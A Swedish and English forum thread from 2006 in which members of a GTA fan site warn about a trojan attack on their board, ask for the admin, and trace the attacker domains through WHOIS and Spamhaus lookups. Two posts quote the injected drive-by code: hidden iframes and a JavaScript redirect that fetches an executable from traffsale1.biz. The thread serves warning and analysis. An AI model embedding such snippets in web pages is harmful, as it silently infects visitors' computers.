SlewME Skrivet 2 maj, 2006 Rapportera Share Skrivet 2 maj, 2006 Det ser ut som om att GTAsajten är utsatt för en trojanattack. Råder alla till att INTE ladda ner filen! Ladda alltså INTE ner filen! Citera Länk till kommentar Dela på andra sidor More sharing options...
rabarben Skrivet 2 maj, 2006 Rapportera Share Skrivet 2 maj, 2006 Moderatorer gör ett annoncement! Citera Länk till kommentar Dela på andra sidor More sharing options...
SlewME Skrivet 2 maj, 2006 Skapat av Rapportera Share Skrivet 2 maj, 2006 Moderatorer gör ett annoncement! Frågat kaller om detta. Tror inte att det går i denna version, han kände i alla fall inte till något. Citera Länk till kommentar Dela på andra sidor More sharing options...
StellHell Skrivet 2 maj, 2006 Rapportera Share Skrivet 2 maj, 2006 Ja, SlewME snackar inte i nattmössan. LADDA INTE NER TROJANEN Vi försöker få tag på Hultenius så snabbt som möjligt. Tillsvidare lär forumet vara aningen dött. Citera Länk till kommentar Dela på andra sidor More sharing options...
SlewME Skrivet 2 maj, 2006 Skapat av Rapportera Share Skrivet 2 maj, 2006 Hultan kanske ska se över hurvida IPB 2 är aktuellt. IPB 1.3 är som sagt en gammal ipbversion och inte lika säker som senare IPB-versioner. Hoppas denna trojan har bevisat att det är dags att uppgradera forumet. Citera Länk till kommentar Dela på andra sidor More sharing options...
StellHell Skrivet 2 maj, 2006 Rapportera Share Skrivet 2 maj, 2006 Hultan kanske ska se över hurvida IPB 2 är aktuellt. IPB 1.3 är som sagt en gammal ipbversion och inte lika säker som senare IPB-versioner. Hoppas denna trojan har bevisat att det är dags att uppgradera forumet. Ett IPB v2.1.5 forum blev infekterat igår med. Så, ja.. Spela roll. Citera Länk till kommentar Dela på andra sidor More sharing options...
SlewME Skrivet 2 maj, 2006 Skapat av Rapportera Share Skrivet 2 maj, 2006 (redigerad) Ett IPB v2.1.5 forum blev infekterat igår med. Så, ja.. Spela roll. Hm, det visste jag inte. Får kanske se över säkerheten på mina forum då trojanen förmodligen säker igenom forumet efter länkar till andra forum, inte omöjligt. Usch för den där. Sidan ser dock normal ut för mig nu i och med att jag blockerat hiddenframes i min brandvägg. Redigerad 2 maj, 2006 av SlewME Citera Länk till kommentar Dela på andra sidor More sharing options...
rabarben Skrivet 2 maj, 2006 Rapportera Share Skrivet 2 maj, 2006 Här står det om trojanen Citera Länk till kommentar Dela på andra sidor More sharing options...
BigBear Skrivet 2 maj, 2006 Rapportera Share Skrivet 2 maj, 2006 Tänkte precis skapa tråd, fan problem att komma in på forumet. NOD32 har fått fnatt. Polarn har även fått mail om att tanka filen loadadv721.exe Aja, hoppas ingen är dum nog och tankar. Citera Länk till kommentar Dela på andra sidor More sharing options...
SlewME Skrivet 2 maj, 2006 Skapat av Rapportera Share Skrivet 2 maj, 2006 (redigerad) Tänkte precis skapa tråd, fan problem att komma in på forumet. NOD32 har fått fnatt. Polarn har även fått mail om att tanka filen loadadv721.exe Aja, hoppas ingen är dum nog och tankar. Japp, Nod32 gillade inte filen som tur var. Hoppas på att hultan är snabb och åtgärdar detta. " <AD- me src="http://traffsale1.biz/dl/adv721.php" width=1 height=1><AD- ame> <!-- pt language="JavaScript">window.location.href = "http://traffsale1.biz/dl/loadadv721.exe"</scri-->" Redigerad 2 maj, 2006 av SlewME Citera Länk till kommentar Dela på andra sidor More sharing options...
rabarben Skrivet 2 maj, 2006 Rapportera Share Skrivet 2 maj, 2006 Går det att ta bort den om du tar full system scan på norton? Citera Länk till kommentar Dela på andra sidor More sharing options...
StellHell Skrivet 2 maj, 2006 Rapportera Share Skrivet 2 maj, 2006 Kan lika gärna skriva det här också. can confirm the site has been hacked with the same hack as before, IFRAME in the User header linking to the exploit. Using a different browser is not the solution, getting rid of the goddamn virus is And why isn't that shit ass traffsale.biz site SHUT DOWN! These adware people are the scourge of the earth. I would like to break all of their fingers for coding this shit. Indeed, the board seems to have been exploited. Viewing the source yields this: CODE <iframe src="http://196.regvista.com/index.php?ref=wde" width="0" height="0" frameborder="0"></iframe> The URL in particular redirects to an affrontgl.com-address. Seems like it generates a unique one too, how considerate... However, the affrontgl.com nameservers seem quite unresponsive. Let's see if we can figure out more about them... CODE Domain Name: AFFRONTGL.COM Registrar: ONLINE SAS Whois Server: whois.bookmyname.com Referral URL: http://www.bookmyname.com Name Server: AA.CHARISMDE.COM Name Server: BB.CHARISMDE.COM Status: ACTIVE Updated Date: 05-mar-2006 Creation Date: 19-feb-2006 Expiration Date: 19-feb-2007 AA.CHARISMDE.COM A 219.72.229.209 bb.charismde.com A 220.248.227.112 Searching for nameservers with the same IP as the secondary yields the following: CODE BB.COBBLYEA.COM BB.CHARISMDE.COM DD.GROOMISHNL.COM AA.HERDSMANIF.COM AV.METEYARDBM.COM RR.GUSSIELJ.COM EE.VANGELIHN.COM BB.GALLICEN.COM CE.NICENISTCE.COM Let's ask spamhaus. CODE 219.72.229.209 is listed in the SBL, in the following records: SBL39300 Hmm, interesting (though not surprising). Let's see what they've been up to. CODE 219.72.229.209/32 is listed on the Register Of Known Spam Operations (ROKSO) database as being assigned to, under the control of, or providing service to a known professional spam operation http://www.spamhaus.org/sbl/sbl.lasso?query=SBL39300 Bah, spammers. Looking up 196.regvista.com (85.255.115.196) yields another record, SBL36702... CODE DNSChanger Trojan home http://vil.mcafeesecurity.com/vil/content/v_136602.htm Symptoms * Presence of the file: o %SYSTEMROOT%\SYSTEM32\HGQHP.EXE * Having DNS entries in any of your network adaptors with the values: o 85.255.112.132 o 85.255.113.13 * Finding traffic targeting: o 195.95.218.100 Hultan, var är du? Citera Länk till kommentar Dela på andra sidor More sharing options...
rabarben Skrivet 2 maj, 2006 Rapportera Share Skrivet 2 maj, 2006 Wiiie! Startade om datorn och det kommer inte upp några rutor från norton längre... Betyder det att trojanskiten är borta? Citera Länk till kommentar Dela på andra sidor More sharing options...
P-C Skrivet 2 maj, 2006 Rapportera Share Skrivet 2 maj, 2006 Fixa dirr! Citera Länk till kommentar Dela på andra sidor More sharing options...
GiZmo Skrivet 2 maj, 2006 Rapportera Share Skrivet 2 maj, 2006 Wiiie! Startade om datorn och det kommer inte upp några rutor från norton längre... Betyder det att trojanskiten är borta? Nepp, den är kvar :/ Citera Länk till kommentar Dela på andra sidor More sharing options...
Xemtoth Skrivet 2 maj, 2006 Rapportera Share Skrivet 2 maj, 2006 Fick virusvarning, tog bort den när den av någon rolig anledning kom till datorn Citera Länk till kommentar Dela på andra sidor More sharing options...
I lol Skrivet 2 maj, 2006 Rapportera Share Skrivet 2 maj, 2006 Fy fan =/ Sökte på google vad Traffsale1.biz, kom till någon sida (China Defense (Nej jag kan inte kinesiska, det stod nog på engelska).) Där stod det hur man tar bort den om man blir smittad. Citera Länk till kommentar Dela på andra sidor More sharing options...
Vice. Skrivet 2 maj, 2006 Rapportera Share Skrivet 2 maj, 2006 HELVETE!!!! Jag skulle trycka på add peply och då dök den jävla rutan upp och jag klickade ja. En ruta kom upp var vill du spara? Men jag avbröt. Fick jag viruset på datorn??? Vem fan har fixat detta? Sur banndad medlem? Citera Länk till kommentar Dela på andra sidor More sharing options...
Juster Skrivet 2 maj, 2006 Rapportera Share Skrivet 2 maj, 2006 HELVETE!!!! Jag skulle trycka på add peply och då dök den jävla rutan upp och jag klickade ja. En ruta kom upp var vill du spara? Men jag avbröt. Fick jag viruset på datorn??? Vem fan har fixat detta? Sur banndad medlem? Jag tror inte du fick viruset på datorn som tur är damn småirriterande popup då Citera Länk till kommentar Dela på andra sidor More sharing options...
chucky.swe Skrivet 2 maj, 2006 Rapportera Share Skrivet 2 maj, 2006 Tror jag inte eftersom den har drabbat flera forum.. HULTAN!!! var är du vi behöver dig nu!! Citera Länk till kommentar Dela på andra sidor More sharing options...
Recommended Posts